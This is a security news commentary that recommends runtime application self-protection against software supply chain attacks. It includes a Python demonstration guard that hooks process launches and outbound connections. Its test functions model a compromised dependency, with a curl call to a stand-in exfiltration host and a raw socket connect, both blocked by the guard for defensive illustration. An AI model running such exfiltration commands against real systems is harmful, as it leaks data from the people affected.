The Australian Government has released the Critical Technology Supply Chain Principles this week, and below is the reactive commentary from information security experts.
<p>In the US, the National Institute of Standards and Technology (NIST) has recognised that many security controls fail to address the challenge of mitigating software supply chain attacks. It determined that only runtime protection prevents these stealthy attacks and <a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf">recommends Runtime Application Self-Protection (RASP)</a> as a control to respond to emerging threats from the software supply chain. If the Australian Government wants to further mitigate supply chain risk it should consider adding RASP as a control in existing advice issued by the ACSC such as the Information Security Manual (ISM), the Cyber Supply Chain Risk Management Framework, or the Essential Eight.</p>
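The commentary above argues that runtime protection catches what static supply chain controls miss: a dependency that is tampered with after it has been vetted. The following is an added, illustrative example written for this page; it is not NIST's reference design, not a commercial RASP product, and not code from the author. It shows the core idea of RASP in miniature: the application instruments its own sensitive sinks (here `subprocess.Popen` and `socket.socket.connect`) and enforces a policy on them while it runs, so an upstream library that unexpectedly spawns a process or opens a network connection is blocked and the event is recorded. The policy, the "tampered dependency" behaviours and the 192.0.2.10 address (a documentation-only range) are all constructed for the demonstration.

```python
"""Minimal RASP-style runtime guard (illustrative, not a production control)."""
import socket
import subprocess
import sys
from contextlib import contextmanager
from dataclasses import dataclass, field
from typing import Callable, List


class RuntimeViolation(RuntimeError):
    """Raised when instrumented code attempts an action outside policy."""


@dataclass(frozen=True)
class Policy:
    """Constructed policy: which executables and hosts the application may use."""
    allowed_executables: frozenset
    allowed_hosts: frozenset


@dataclass
class RuntimeGuard:
    """Hooks process creation and outbound connects, enforcing the policy in-process."""
    policy: Policy
    events: List[dict] = field(default_factory=list)

    def _record(self, kind: str, detail: str) -> None:
        # In a real deployment this would feed the SIEM; here it is an in-memory audit trail.
        self.events.append({"kind": kind, "detail": detail})

    def check_exec(self, args) -> None:
        if isinstance(args, (list, tuple)):
            exe = str(args[0]) if args else ""
        else:
            exe = (str(args).split() or [""])[0]
        if exe not in self.policy.allowed_executables:
            self._record("blocked_exec", exe)
            raise RuntimeViolation(f"process launch blocked: {exe}")
        self._record("allowed_exec", exe)

    def check_connect(self, address) -> None:
        host = str(address[0]) if isinstance(address, tuple) else str(address)
        if host not in self.policy.allowed_hosts:
            self._record("blocked_connect", host)
            raise RuntimeViolation(f"outbound connection blocked: {host}")
        self._record("allowed_connect", host)

    @contextmanager
    def active(self):
        """Install the hooks for the duration of the block, then restore the originals."""
        original_popen_init = subprocess.Popen.__init__
        original_connect = socket.socket.connect
        guard = self

        def guarded_popen_init(popen_self, *a, **kw):
            guard.check_exec(kw.get("args", a[0] if a else None))
            original_popen_init(popen_self, *a, **kw)

        def guarded_connect(sock_self, address):
            guard.check_connect(address)
            return original_connect(sock_self, address)

        subprocess.Popen.__init__ = guarded_popen_init
        socket.socket.connect = guarded_connect
        try:
            yield self
        finally:
            subprocess.Popen.__init__ = original_popen_init
            socket.socket.connect = original_connect


# Constructed policy: only the current interpreter may be spawned, only loopback contacted.
DEFAULT_POLICY = Policy(
    allowed_executables=frozenset({sys.executable}),
    allowed_hosts=frozenset({"127.0.0.1"}),
)


def run_under_guard(action: Callable[[], None], policy: Policy = DEFAULT_POLICY):
    """Run `action` with the guard active; return (was_blocked, recorded_events)."""
    guard = RuntimeGuard(policy)
    with guard.active():
        try:
            action()
            return False, guard.events
        except RuntimeViolation:
            return True, guard.events


def benign_action() -> None:
    """Expected behaviour of a vetted dependency: spawns the interpreter itself."""
    subprocess.run([sys.executable, "-c", "print('report generated')"],
                   check=True, capture_output=True)


def tampered_exec_action() -> None:
    """Constructed model of a compromised dependency that reaches for curl."""
    subprocess.run(["curl", "-s", "http://exfil.example.invalid/upload"])


def tampered_network_action() -> None:
    """Constructed model of a compromised dependency opening a raw outbound socket."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(1)
        s.connect(("192.0.2.10", 443))  # TEST-NET-1 address, never actually reached


if __name__ == "__main__":
    for name, action in [("benign", benign_action),
                         ("tampered exec", tampered_exec_action),
                         ("tampered network", tampered_network_action)]:
        blocked, events = run_under_guard(action)
        print(f"{name}: blocked={blocked} events={events}")
```

The hooks raise before the original call runs, so the blocked process is never launched and the blocked socket never leaves the host; the policy is evaluated on the actual runtime arguments rather than on whatever the dependency's source looked like at review time, which is the property the commentary attributes to runtime protection. Restoring the originals in `finally` keeps the guard from leaking into code outside the protected block.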
Information Security Buzz (aka ISBuzz News) is an independent resource that provides expert comments, analysis and opinion on the latest information security news and topics.